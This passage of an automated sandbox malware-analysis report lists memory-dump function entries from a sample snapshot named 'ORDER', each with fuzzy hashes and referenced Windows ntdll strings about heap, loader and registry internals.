                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                          • API String ID: 0-3178619729
                          • Opcode ID: 9fffb8db395423310978dfef07adf4feaabeb161e7c44e474a70639c5dd52454
                          • Instruction ID: 351b415936228d1386f1b58187cdf591b48cb17149121432413bab1d7b1b6278
                          • Opcode Fuzzy Hash: 9fffb8db395423310978dfef07adf4feaabeb161e7c44e474a70639c5dd52454
                          • Instruction Fuzzy Hash: 9012E474600741EFE718CF29C480BA6B7E1FF45704F65859DD8A99B786DB70E881CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                          • API String ID: 0-1168191160
                          • Opcode ID: c0efbe6844ca1e385d3cc658e80a88ff8bd5b042216ea259c68196aaab57b88b
                          • Instruction ID: a0b71096db30e50dd1d2caa29611a567d0c41f0a6256f2403eddac4e1ea70cdd
                          • Opcode Fuzzy Hash: c0efbe6844ca1e385d3cc658e80a88ff8bd5b042216ea259c68196aaab57b88b
                          • Instruction Fuzzy Hash: 8AF181B5A002288BDF20DB16CC807D9BBB5AF48744F5480D9DA89A7341FBB19EC5CF65
                          Strings
                          • HEAP: , xrefs: 324214B6
                          • HEAP[%wZ]: , xrefs: 32421632
                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32421648
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                          • API String ID: 0-3178619729
                          • Opcode ID: 980f8e1d9c904719de3b58011553675bf7f1e201609ca9566ba49c1363aabb2d
                          • Instruction ID: 3c2abd109081d27ca7f853c3f54027482961f5333ea16819404473493031e127
                          • Opcode Fuzzy Hash: 980f8e1d9c904719de3b58011553675bf7f1e201609ca9566ba49c1363aabb2d
                          • Instruction Fuzzy Hash: 85E1E1746047459FEB18CF29C4407BABBE5EF48704F14895DE8AACB346EB34E981CB50
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 324900F1
                          • RTL: Re-Waiting, xrefs: 32490128
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 324900C7
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 531761c48dd712cb26bc2e986c807eb65bb0629bc04fd33c08f5b8149785ed4b
                          • Instruction ID: 723af2eeac5d2c80d81752b9ee5fc67e833cdfd9db9ab1c61fa71c0a8ec92066
                          • Opcode Fuzzy Hash: 531761c48dd712cb26bc2e986c807eb65bb0629bc04fd33c08f5b8149785ed4b
                          • Instruction Fuzzy Hash: 7BE1DF746087419FE715CF28C880B6ABBE0BF84758F110A1DF5A58B3E1DB75E985CB42
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          • Opcode ID: 0020baf63ec3cdfaae5a329ffdc1875669a2462baff626f313a6c865ad177f5d
                          • Instruction ID: 72d5ae00e53dc424cfd0ea3f7f1615906fb13154b5d6666a800d3f4e9944a93c
                          • Opcode Fuzzy Hash: 0020baf63ec3cdfaae5a329ffdc1875669a2462baff626f313a6c865ad177f5d
                          • Instruction Fuzzy Hash: 71A191759016299BDB21DF68CC88BEAB7B8EF04704F1045EAE918A7250DB759EC4CF50
                          Strings
                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 324FB3AA
                          • GlobalizationUserSettings, xrefs: 324FB3B4
                          • TargetNtPath, xrefs: 324FB3AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                          • API String ID: 0-505981995
                          • Opcode ID: 62a73a8bbc749be2684a223d7f2fa88abd82b273c349f676aee66618c9746593
                          • Instruction ID: c59738cee1718b8c12e7fe1761efbf5b873d4fd97adb0b1e589f7805a0aac6ea
                          • Opcode Fuzzy Hash: 62a73a8bbc749be2684a223d7f2fa88abd82b273c349f676aee66618c9746593
                          • Instruction Fuzzy Hash: 6661A272D41229BBDB21DF54DC88BD9B7B8EB49714F4101E9EA08AB250CB74DE84CF90
                          Strings
                          • HEAP: , xrefs: 3247E442
                          • HEAP[%wZ]: , xrefs: 3247E435
                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3247E455
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                          • API String ID: 0-1340214556
                          • Opcode ID: 03c660d6d4dad8a53b27210b9f5c5f3f8c9fbfab67eefdbc333b43de29961690
                          • Instruction ID: 9c2e1c1e324a5741ed62911ada11d968ad318a3df917d29615c09b6bb42d1bd0
                          • Opcode Fuzzy Hash: 03c660d6d4dad8a53b27210b9f5c5f3f8c9fbfab67eefdbc333b43de29961690
                          • Instruction Fuzzy Hash: 09511435700784AFE312CBA8C894F9ABBF8EF05344F1541A9E5608B792D7B4F942CB90
                          Strings
                          • LdrpCompleteMapModule, xrefs: 3248A39D
                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3248A396
                          • minkernel\ntdll\ldrmap.c, xrefs: 3248A3A7
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                          • API String ID: 0-1676968949
                          • Opcode ID: 54878f158048f0d4697ae1fa15dc1451227480f04a5e6331932d318e29bf8728
                          • Instruction ID: 51475cde73cca1c7e3fbaae1f5432e2894f8adee9f128f494cd2e3a74e4bf8c2
                          • Opcode Fuzzy Hash: 54878f158048f0d4697ae1fa15dc1451227480f04a5e6331932d318e29bf8728
                          • Instruction Fuzzy Hash: 07513575A00741DBF712CF59C844B8A7BE4EF04B58F1005A8E9659B3E2DFB4E941CB44
                          Strings
                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 324CD7B2
                          • HEAP: , xrefs: 324CD79F
                          • HEAP[%wZ]: , xrefs: 324CD792
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                          • API String ID: 0-3815128232
                          • Opcode ID: 4b63bded528acead1548dc0af11a3625fbbcd396b733fe28090c25a641861c3f
                          • Instruction ID: 2f05bd9c119a1261a651bb1bd2526bc2b3f261da095af8af77b96c7b5397dc1b
                          • Opcode Fuzzy Hash: 4b63bded528acead1548dc0af11a3625fbbcd396b733fe28090c25a641861c3f
                          • Instruction Fuzzy Hash: 9851027D201B60EAF354DE2DC84077273E1DF45688F50886EE4C98B685EA36E887DB20
                          Strings
                          • @S?2, xrefs: 3242A268
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 3242A229
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 3242A21B
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @S?2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-1870703032
                          • Opcode ID: d469c8e4b6c0ee8c1140efa624a0d1af43cefc96c6cd9e2feab91b96a60dee6a
                          • Instruction ID: 011d03d53ce35720d93dff6968c7622e068bca0fe11975c55d1af31d019d08cd
                          • Opcode Fuzzy Hash: d469c8e4b6c0ee8c1140efa624a0d1af43cefc96c6cd9e2feab91b96a60dee6a
                          • Instruction Fuzzy Hash: A941A979A007949FEB06CF9AC840B5AB7B4EF45754F2140A9EC00DF3A0EA76D981CB21
                          Strings
                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 324AB2B2
                          • GlobalFlag, xrefs: 324AB30F
                          • @, xrefs: 324AB2F0
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                          • API String ID: 0-4192008846
                          • Opcode ID: 12fc7287699e2d19715a3f7bc9545aa5a2d9b24a878e33161627da40504a5d72
                          • Instruction ID: e329fadba965078c77132e2b2bb19e8eaf116ffd332252ae3464e66f92d6118e
                          • Opcode Fuzzy Hash: 12fc7287699e2d19715a3f7bc9545aa5a2d9b24a878e33161627da40504a5d72
                          • Instruction Fuzzy Hash: B6314DB1D01209AFDB11DF95DC90AEEBBBCEF54748F40446DE605AB241EBB49E44CB90
                          Strings
                          • DLL "%wZ" has TLS information at %p, xrefs: 3249184A
                          • LdrpInitializeTls, xrefs: 32491851
                          • minkernel\ntdll\ldrtls.c, xrefs: 3249185B
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                          • API String ID: 0-931879808
                          • Opcode ID: 7472c760c875841b87df00063ffeb11b67aeaf11ac883514d0b92f9a7e0d0d1c
                          • Instruction ID: a772b12ea34990fd43e48931c8d377383bfa20e3a0094c9b9b4127ce049cfb9d
                          • Opcode Fuzzy Hash: 7472c760c875841b87df00063ffeb11b67aeaf11ac883514d0b92f9a7e0d0d1c
                          • Instruction Fuzzy Hash: 6C31F871A50204BBFB108F55CC45F9A7BA8BB44B88F610459F549B7380EBB0BF85C790
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 846d7810f128e09750152e574843e1eaa72f73b41632ddc07146f419636bb25c
                          • Instruction ID: 8885977d7debc7fe26b7a20b5d176438db08b58d1b11f5129a837ff0a8ae7e72
                          • Opcode Fuzzy Hash: 846d7810f128e09750152e574843e1eaa72f73b41632ddc07146f419636bb25c
                          • Instruction Fuzzy Hash: 96619D75A01706AFDB08CF79C580A9DFBB5BF88744F24826ED519A7300DB74AA52CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@
                          • API String ID: 0-149943524
                          • Opcode ID: d052ca37c48f955ea626348665fdd8190f8d2a05ff5dace65c8cc0d3134be5df
                          • Instruction ID: 0d37667d02d26831205078c7901d190e760d812498df11a00bb6b55e44d13867
                          • Opcode Fuzzy Hash: d052ca37c48f955ea626348665fdd8190f8d2a05ff5dace65c8cc0d3134be5df
                          • Instruction Fuzzy Hash: 6C32EFB55093518BD726CF14C480B2EB7E1EF8C748F50492EFA858B390EB74D8A5CB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 826f2d03146532b7800a48ab33ca93fca5a73181c4714eee05cfc38b3b3cf5bf
                          • Instruction ID: 3fa7eb13de36ccfebe6f63cf6d050dcabfa532417cb4137c335484e609293f85
                          • Opcode Fuzzy Hash: 826f2d03146532b7800a48ab33ca93fca5a73181c4714eee05cfc38b3b3cf5bf
                          • Instruction Fuzzy Hash: CB31E131211B12EFE74ADF65CA40B8AFB65BF88B54F001019E90497B50DFB1E861CBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$AddD
                          • API String ID: 0-2525844869
                          • Opcode ID: 791b3212952ffbaf065183e735fbf383f14290419a925be2fe6dcb995a34f5e1
                          • Instruction ID: cf5765637c9544e2c86918196de412364accf1b2503d9c7cd156bf3e11b29926
                          • Opcode Fuzzy Hash: 791b3212952ffbaf065183e735fbf383f14290419a925be2fe6dcb995a34f5e1
                          • Instruction Fuzzy Hash: 24A16EB6504340AFE314CF14C854BABB7EDFF94B48F544A2EF99986250E7B0E905CB62
                          Strings
                          • RedirectedKey, xrefs: 324FB60E
                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 324FB5C4
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                          • API String ID: 0-1388552009
                          • Opcode ID: 15fcfbf923095ffdd405cd8e6346c075ee3675ca513ed700b4b315311f2410d4
                          • Instruction ID: 4df201f539901c8ffaa873d294f32a5e6e570f27a0d3a8fbc5c0881509df8c56
                          • Opcode Fuzzy Hash: 15fcfbf923095ffdd405cd8e6346c075ee3675ca513ed700b4b315311f2410d4
                          • Instruction Fuzzy Hash: 5D6133B5C41218FFDF11DF94D888ADEBBB8FB49704F50406AE904A7240DB359A86CFA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$
                          • API String ID: 3446177414-233714265
                          • Opcode ID: a6a96a19822cb1622e528f988d3e0db3c3594c24770777d7d9cdc2e9f8f906d4
                          • Instruction ID: b4ed7f03b716e0f4c857e058f4f00f109d9bf5af5c0c42bf4188a256b9cc3211
                          • Opcode Fuzzy Hash: a6a96a19822cb1622e528f988d3e0db3c3594c24770777d7d9cdc2e9f8f906d4
                          • Instruction Fuzzy Hash: A561CD75A02B49CFEB26CFA8C580B9DB7B1BF48708F11446DD6156B780CBB5B991CB80
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                          • API String ID: 0-118005554
                          • Opcode ID: bebe6f4772e1703f5e48e071f17d8f550b11d7098b177ef87c3f6273212aae9c
                          • Instruction ID: 056a7f8987218a8fe7b68e1f768f94b92fd1502c35e7cfe7c0991392908d1b7e
                          • Opcode Fuzzy Hash: bebe6f4772e1703f5e48e071f17d8f550b11d7098b177ef87c3f6273212aae9c
                          • Instruction Fuzzy Hash: 643112752093809BDB06CF6AD840B1ABBE8EF88714F04085DFC948B380FBB5D905C7A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: A2$ A2
                          • API String ID: 0-8981658
                          • Opcode ID: 80e406ccf7f59af3e732fe8035aa0e187e2cebe3780998cf8f2304ce38f0a349
                          • Instruction ID: ecad91d86fe7fb16c77bf6a1f1f018fc7a7ec357928cf1fcd054d294fb57970a
                          • Opcode Fuzzy Hash: 80e406ccf7f59af3e732fe8035aa0e187e2cebe3780998cf8f2304ce38f0a349
                          • Instruction Fuzzy Hash: 1A31CE36604B429FD716DE2AC890A9BBBE5AFE86A0F014569FC1597310EE30DC05CFA1
                          Strings
                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3249289F
                          • RtlpInitializeAssemblyStorageMap, xrefs: 3249289A
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                          • API String ID: 0-2653619699
                          • Opcode ID: f8c9c940898a4e1ce41bf3701793f97c88b1a0eff276b5e3cb104ced528ffeae
                          • Instruction ID: c411f72dfe0477e0f864d9b337ad777592a0340fe34ec2b09e5115d4281d9c42
                          • Opcode Fuzzy Hash: f8c9c940898a4e1ce41bf3701793f97c88b1a0eff276b5e3cb104ced528ffeae
                          • Instruction Fuzzy Hash: FD112576B00215BBF71ACB48CD40F9B7BA8DB89754F20807DBA04EB344EAB4CD4186A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          • Opcode ID: 845e383a3cd3e1aec9477b6915e354cf88011ee4e191ad76b99004f13386e785
                          • Instruction ID: 9f3347aceb4862e6ea44f8db6bc5a2d1c32e32bcd34d1e94cd7feedddd6c1b62
                          • Opcode Fuzzy Hash: 845e383a3cd3e1aec9477b6915e354cf88011ee4e191ad76b99004f13386e785
                          • Instruction Fuzzy Hash: 0501DCB2151744AFE311CF24CD05F2277E8EB44759F148979F698C7590EB34EA44CB46
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID: MUI
                          • API String ID: 0-1339004836
                          • Opcode ID: 41b384144e809021e667e9f67ccf87e3c0ac747c2295e0b7267d877e4f7f228d
                          • Instruction ID: 04d1ec0ad4d8acf45584f64963dfdad76360d1253476b11ea6aaeea29a7f922d
                          • Opcode Fuzzy Hash: 41b384144e809021e667e9f67ccf87e3c0ac747c2295e0b7267d877e4f7f228d
                          • Instruction Fuzzy Hash: 1E823A79E00318DFEB14CFAAC980BADB7B1BF48354F118169D859AB390DB719986CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec509a5a79ccc90ecc4a38ccfc352013d63c7753aaef1743e8ea301342c0ba7d
                          • Instruction ID: e3a88a77e15430bf8bcfd609c48d1638ed270f328420166eb6112172efb15e1c
                          • Opcode Fuzzy Hash: ec509a5a79ccc90ecc4a38ccfc352013d63c7753aaef1743e8ea301342c0ba7d
                          • Instruction Fuzzy Hash: C4E19A75609342CFD304CF29C090A5ABBE1FF88358F448A6DE99987351DB71E946CF92
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 8d02f3630ca404807e12f6688646889bdf264aa0dcfc598f52b4ca75e322a788
                          • Instruction ID: 13049436adabe76ecaab55ff8476ea631579128838139a58f993111224a0f057
                          • Opcode Fuzzy Hash: 8d02f3630ca404807e12f6688646889bdf264aa0dcfc598f52b4ca75e322a788
                          • Instruction Fuzzy Hash: 64B102B55093808FD355CF28C480A5AFBF1BF88708F14496EF8A99B352D771E985CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.32882001004.00000000323F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 323F0000, based on PE: true
                          • Associated: 00000003.00000002.32882001004.0000000032519000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.32882001004.000000003251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_323f0000_ORDER.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 55f15c8dca8bff6975ad2adac6428454b68092fe599eb539f175ea3048884b4d
                          • Instruction ID: 0a2c909ac37fca6931d1bfe90c0a8126a4c1829a1543fa3a04479adac0ec3b81
